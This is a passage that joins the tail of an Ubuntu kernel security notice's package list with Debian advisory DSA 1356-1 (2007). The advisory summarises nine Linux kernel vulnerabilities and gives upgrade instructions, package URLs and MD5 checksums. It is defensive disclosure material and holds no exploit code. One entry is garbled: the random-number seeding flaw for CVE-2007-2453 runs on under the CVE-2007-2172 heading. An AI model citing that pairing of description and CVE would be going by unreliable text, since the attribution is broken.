http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb
  Size/MD5: 24218060 aab7fc0aad04b0de9413623ad31d1b2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.31_powerpc.deb
  Size/MD5:  2127114 a5fc2cbbb33a5347bebfbc6e163ebe80
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.31_powerpc.deb
  Size/MD5:  2853502 6c53e0efb48f37a924a29250f943f817
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.31_powerpc.deb
  Size/MD5:  2048790 d653fc70fe49dc380023d2a5498936e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_powerpc.deb
  Size/MD5:   644014 9da17f10f2d56ea22b65fa98926800cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   253018 d277f40b34880f91bb2c056aff6ac944
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   295082 58819ea33818cb4aeb48cfdae6395a98
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   155556 495756400fc7ec91ab232f3ebd89d385
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   168438 78fe49aa32d9e4500fc43ae59cb60d7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   248196 4974d3b007dfe46ce42a2b06c8e17e32
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   279960 a1e9f0007ab0df9f948fdfed5cc26770
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  1110514 16d9506e2af45001d4ff88cf090190d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  1110664 3093478896f990fc5843a9fac313ca99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  1951274 1ce8ec5d210a625754b051707ac2f007
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  2253544 4cec0807f70fea6b523482e17a8c3f3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   233510 d8a0602f850212b4033bf6d0d3f548b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   223082 8423289edb7f8b98d8d137fa50bf2cd2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   172830 ec4875ed04bf8fe234b1d077edfe2530
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   205458 d6dcff3d393701c4e74a40ea1fad791f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   280984 0677e9ed958f75e003c1be08c278e39a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   316602 2635b1021b00635ecf2fe2b165f878ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    44660 99af30e421d82a3ee7ab8dd830b3279e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    43412 8e3266956a0680df84b833337a9e7052
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    41214 fb70bee40375248794dedfdec971d05d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    53688 6e3d3491ba08fbbfa24c667ba03b010f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    72816 c0555aa557ec4f17de285bdf860289fa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    85290 7701eef53b049cef94049934db28a53f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    74544 3371da9e68ff23fa9a44ab4be9594817
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    29718 0cf514c1aec245368814c31543c058fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:     8400 eaf01ca132467927b60e01de21c964c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:     9882 f369668ec2986b9bb2e835c792f53a5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    56160 f7ebbeedcf2f88cf4ca321351c9da193
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    67414 89742f040e6be6207bda53276f2633eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    86638 c793c199e9b5b47ea0cd6e1b4a0cf077
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   129208 fcb49eab78230ea9fc2f96b5228641a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   322566 5ec4f9114292dbe0dee389083f12d26b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   322590 48cabc807eef249b4594d8c381a81363
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  1415824 bfbba6cfea2b470d8a97e9a4d4f88b9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:  1345416 759d88182f74baff59cf7a96aa6642f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    74232 37b357240eec1bc03aee9b33c3722295
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    83246 b61bcb2c2c62ad88ff41809426778567
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    12016 93ede1fbe9359ed417f07a091a4d9819
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    13946 10c51757e6febf19e2d3417335ef5766
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    78350 16e3593d499463b13dd71d9d09b688eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    85458 946690439579373ea1826342220071cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   398198 d840472b2574e16ea6f44c5f45427de6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   445188 ee7e96c614a00d1137483658a5450c0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:    76716 782937e9d57c10902d871b281cf62515
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.31_powerpc.udeb
  Size/MD5:   100188 7dd8d77b380f4b3d7a656532510c775f

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    53734 56e3639109c91b9c70151398b3837add
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    42156 01eaf1c77f77ac711cbfa3b6bd7c9ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   211712 79f67c0341bc145590ca2485f7364824
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   607888 d18af721cafb8bec7d1e17297dfbcc32
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   142706 09e2dfa857a349061e96f467e9c825b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    51444 db22c9845a481ca60d58a1f844695163
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    37408 eaedbf00ede88a54db7b13762fdcb716
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   151156 6ee9c9decad54a21140c90893d10b0aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:  1930634 333430bccad9de0487af5a050173091b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb
  Size/MD5:   779738 031e5d9af9445b517c49c8aefcb4dd40
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb
  Size/MD5:   778590 07b6ba1bb24fc1907b991575b8705807
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_sparc.deb
  Size/MD5:  8120610 4418251e39b254cf57130e35220621fa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb
  Size/MD5: 16955024 69bcc60276b1759bde1206dd2e46584f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb
  Size/MD5: 16590864 08de9c062a191c372b33bf7449e476b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb
  Size/MD5:  2262940 07bccad347f0390fb8c1b498b4a668d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb
  Size/MD5:  2176860 3c6adeb479419b6d42ea864eba0f1be1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_sparc.deb
  Size/MD5:   699174 74d4da9c93b515d1dc80cd6f5c8a6d86
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   264332 b3cb71049afbeaf81b0ca1fa1d5e95d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   156572 cd9bdd297c18316905ea3f660a2be324
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   241028 5deb47cc86fdff7ccaf49d50ac4476f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:  1110524 7b330f95a1cacc790372ef810bc9cda7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:  1571854 7fe9b3ea1766e53415deec6a78c31a89
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   180384 8e8cae9b9c2217cc6fa610160b48ea21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   310086 9c3269d5982382258ef0f7938ec42116
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    39662 453530c683eef14de2c8c5ff111fce82
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    37984 4e923ff0f29bb521fa542cbf523fb7b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:     8644 d925f83bd72ace70986656ac077efb0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    59410 a49e42d1e09c5e734167c09e450ea47b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    90820 e0ba3e1bb84fd22cfb6deb879eca9634
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   322566 c64db3fb65e3fccb40d454c3fff95cc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   882382 5edd846df467cdd53baac8b54f4d1721
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:     9828 0d7aac7d3076eed86a509c66a48c8e0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:   290224 eb743d1afdad54d227eddd91e867e7ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb
  Size/MD5:    54798 0dd2e0292ae67485c182631388920467

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA 1356-1 security@debian.org http://www.debian.org/security/ Dann Frazier August 15th, 2007 http://www.debian.org/security/faq


Package : linux-2.6 Vulnerability : several Problem-Type : local/remote Debian-specific: no CVE ID : CVE-2007-1353 CVE-2007-2172 CVE-2007-2453 CVE-2007-2525 CVE-2007-2876 CVE-2007-3513 CVE-2007-3642 CVE-2007-3848 CVE-2007-3851

Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-1353

Ilja van Sprundel discovered that kernel memory could be leaked via the
Bluetooth setsockopt call due to an uninitialized stack buffer.

CVE-2007-2172

Thomas Graf reported a typo in the DECnet protocol handler that could
be used by a local attacker to overrun an array via crafted packets,
potentially resulting in a Denial of Service (system crash). 
A similar issue exists in the IPV4 protocol handler and will be fixed
in a subsequent update. 
Slightly less random numbers resulted from hashing a subset of the
available entropy. zero-entropy systems were seeded with the same
inputs at boot time, resulting in repeatable series of random numbers.

CVE-2007-2525

Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused
by releasing a socket before PPPIOCGCHAN is called upon it. This could
be used by a local user to DoS a system by consuming all available memory.

CVE-2007-2876

Vilmos Nebehaj discovered a NULL pointer dereference condition in the
netfilter subsystem. This allows remote systems which communicate using
the SCTP protocol to crash a system by creating a connection with an
unknown chunk type.

CVE-2007-3513

Oliver Neukum reported an issue in the usblcd driver which, by not
limiting the size of write buffers, permits local users with write access
to trigger a DoS by consuming all available memory.

CVE-2007-3642

Zhongling Wen reported an issue in nf_conntrack_h323 where the lack of
range checking may lead to NULL pointer dereferences. Remote attackers
could exploit this to create a DoS condition (system crash).

CVE-2007-3848

Wojciech Purczynski discovered that pdeath_signal was not being reset
properly under certain conditions which may allow local users to gain
privileges by sending arbitrary signals to suid binaries.

CVE-2007-3851

Dave Airlie reported that Intel 965 and above chipsets have relocated
their batch buffer security bits. Local X server users may exploit this
to write user data to arbitrary physical memory addresses.

These problems have been fixed in the stable distribution in version 2.6.18.dfsg.1-13etch1.

The following matrix lists additional packages that were rebuilt for compatibility with or to take advantage of this update:

                             Debian 4.0 (etch)
 fai-kernels                 1.17+etch4
 user-mode-linux             2.6.18-1um-2etch3

We recommend that you upgrade your kernel package immediately and reboot the machine. If you have built a custom kernel from the kernel source package, you will need to rebuild to take advantage of these fixes.

Upgrade Instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.dsc
  Size/MD5 checksum:     5672 ef2648e54c6ea1769b29ba191fc13083
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.diff.gz
  Size/MD5 checksum:  5306139 589297d453d15848b5879cf22eed7d40
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz
  Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060

Architecture independent components:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-13etch1_all.deb
  Size/MD5 checksum:  3585938 a94cd1247d3dc98378dd094b3b364044
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-13etch1_all.deb
  Size/MD5 checksum:  1081908 36d119bd92dbd35a8f83b191f74daf09
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-13etch1_all.deb
  Size/MD5 checksum:  1475708 0373ab2ac016f31d2591eab4de39e4d3
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-13etch1_all.deb
  Size/MD5 checksum: 41417232 279c0d7b44a451169a118e0a2b0c4eeb
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-5_2.6.18.dfsg.1-13etch1_all.deb
  Size/MD5 checksum:  3738202 e4cfce3e67d3a0f6aeb4fe1fb5706372
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-13etch1_all.deb
  Size/MD5 checksum:    51094 b22167a8b2ab8d0cfb9eded0d0b8d8a0

Alpha architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:  3024210 ad1fc21ac8fcb76a0db86d25737c8a83
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:    50680 28ad3748b8d76abbb2e896f7ff190240
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-alpha_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:    50720 1f106b97c91e07921402b0a2174574c6
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:   263524 4ce1e83ad733aee9d36b075babc6f908
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:   263838 4c9ebe648f73818252ed3de79567219e
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:   262864 a3d6389b9224fcef726128f3a747a4f8
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:  3048212 d86c3c8fac6533904b91592016e2afba
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum:   264300 15606dadab1e1bbb4d9234a8bfb09b5e
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum: 23485186 1978fddd39e8e7ce9ebc88efefd4ebe0
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum: 23464818 bdfd39761fd0bc68de001efb430895af
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum: 23838852 e9ae2b4f056d9b47832234d2aa6ec4d7
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb
  Size/MD5 checksum: 23528772 4f029181ad02c46f2ae2b34038b629e0

AMD64 architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:  3164562 5bef24546e02e53d0b866b68e57c8294
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:    50644 173c9d06298afe48e609cd08a5420737
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:    50668 61e625ce94855d474c0562819ae3b879
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:   270036 cd6f518453e0b75e3d4e17bc1fca62a3
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:  3187796 2958630378a24cb3f16807e04fe17297
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:   269650 dbfd4c56547401e7b6a6460f41dd266b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:  3330944 996a5cba350ae0c9110f8ca72492bfc2
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:   271784 c1841e07342a73c9cf87058cc0ca943b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:  3353796 730dd7dd17cb532152463000f16459f0
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:   270068 363ff82948e473032eaa4fc37d2b9d6b
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum: 16838550 dee2a96f0c89bc9b59b2febd42dc8bb1
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:  1647400 8f72b372c132b40f5c828d7d0a94bf62
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:  1679728 853224dc22a8fa38c8b4af6534886a77
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum: 15238676 d62ddc5e61a35e84529262c9101b0e93
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum: 15256142 8b0667dd7cb043b753ce3a9770058515
http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:    50618 0da191c5dcd2406d079f9aab3b4ca0a3
http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb
  Size/MD5 checksum:    50632 46cd39c06556d9bc465099cddb3c7f3d

ARM architecture:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:  3346806 bc6581484d2364ccba4bbdb275072ecb
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_arm.deb
  Size/MD5 checksum:    50652 976339e33b567d816811d561dc575cc8
